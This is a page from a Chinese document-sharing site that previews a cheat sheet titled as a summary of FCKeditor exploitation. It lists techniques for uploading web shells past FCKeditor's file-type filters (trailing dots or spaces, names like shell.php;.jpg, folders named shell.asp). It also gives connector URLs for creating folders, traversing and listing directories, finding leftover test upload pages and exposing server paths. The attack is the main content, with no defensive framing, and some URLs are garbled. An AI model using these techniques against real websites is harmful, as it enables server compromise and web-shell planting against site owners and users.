Fckeditor漏洞利用总结.doc_第1页
Fckeditor漏洞利用总结.doc_第2页
Fckeditor漏洞利用总结.doc_第3页
Fckeditor漏洞利用总结.doc_第4页
Fckeditor漏洞利用总结.doc_第5页
已阅读5页,还剩2页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

Fckeditor漏洞利用总结 查看编辑器版本 fckeditor/whatsnew.html 2.version2.2版本 apache+linux环境下在上传文件后面加个.突破!测试通过 3.version=2.4.2forphp在处理php上传的地方并未对media类型进行上传文件类型的控制导致用户上传任意文件!将以下保存为html文件修改action地址 4.fckeditor文件上传“.”变“”下划线的绕过方法 很多时候上传的文件例如:shell.php.rar或shell.php;.jpg会变为shellphp;.jpg这是新版fck的变化 4.1:提交shell.php+空格绕过 不过空格只支持win系统*nix是不支持的shell.php和shell.php+空格是2个不同的文件未测试 4.2:继续上传同名文件可变为shell.php;(1).jpg也可以新建一个文件夹只检测了第一级的目录如果跳到二级目录就不受限制 5.突破建立文件夹 fckeditor/editor/filemanager/connectors/asp/connector.asp?mand=createfoldertype=imagecurrentfolder=%2fshell.aspnewfoldername=zuuid=1244789975684 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?mand=createfoldercurrentfolder=/type=imagenewfoldername=shell.asp 6.fckeditor中test文件的上传地址 fckeditor/editor/filemanager/browser/default/connectors/test.html fckeditor/editor/filemanager/upload/test.html fckeditor/editor/filemanager/connectors/test.html fckeditor/editor/filemanager/connectors/uploadtest.html 7.常用上传地址 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?mand=getfoldersandfilestype=imagecurrentfolder=/ fckeditor/editor/filemanager/browser/default/browser.html?type=imageconnector=connectors/asp/connector.asp fckeditor/editor/filemanager/browser/default/browser.html?type=imageconnector=http:/.site.%2ffckeditor%2feditor%2ffilemanager%2fconnectors%2fphp%2fconnector.php(ver:2.6.3测试通过) jsp版: fckeditor/editor/filemanager/browser/default/browser.html?type=imageconnector=connectors/jsp/connector.jsp 注意红色部分修改为fckeditor实际使用的脚本语言蓝色部分可以自定义文 件夹名称也可以利用./.目录遍历紫色部分为实际网站地址 8.其他上传地址 fckeditor/samples/default.html fckeditor/samples/asp/sample01.asp fckeditor/samples/asp/sample02.asp fckeditor/samples/asp/sample03.asp fckeditor/samples/asp/sample04.asp 一般很多站点都已删除samples目录可以试试 fckeditor/editor/fckeditor.html不可以上传文件可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页 9.列目录漏洞也可助找上传地址 version2.4.1测试通过 修改currentfolder参数使用././来进入不同的目录 /browser/default/connectors/aspx/connector.aspx?mand=createfoldertype=imagecurrentfolder=././.%2fnewfoldername=shell.asp 根据返回的xml信息可以查看网站所有的目录 fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?mand=getfoldersandfilestype=imagecurrentfolder=%2f 也可以直接浏览盘符: jsp版本: fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?mand=getfoldersandfilestype=currentfolder=%2f 10.爆路径漏洞 fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?mand=getfoldersandfilestype=filecurrentfolder=/shell.asp 11.fckeditor被动限制策略所导致的过滤不严问题 影响版本:fckeditorx.x=fckeditorv2.4.3 脆弱描述: fckeditorv2.4.3中file类别默认拒绝上传类型: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm fckeditor2.0=2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件上传后它保存的文件直接用的$sfilepath=$sserverdir.$sfilename而没有使用$sextension为后缀.直接导致在win下在上传文件后面加个.来突破未测试 而在apache下因为apache文件名解析缺陷漏洞也可以利用之另建议其他上传漏洞中定义type变量时使用file类别来上传文件,根据fckeditor的代码其限制最为狭隘 在上传时遇见可直接上传脚本文件固然很好但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过也可以利用XX解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg 12.最古老的漏洞type文件没有限制! 我接触到的第一个fckeditor漏洞了版本不详
人人文库> 全部分类> 应用文书 > 年终总结

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论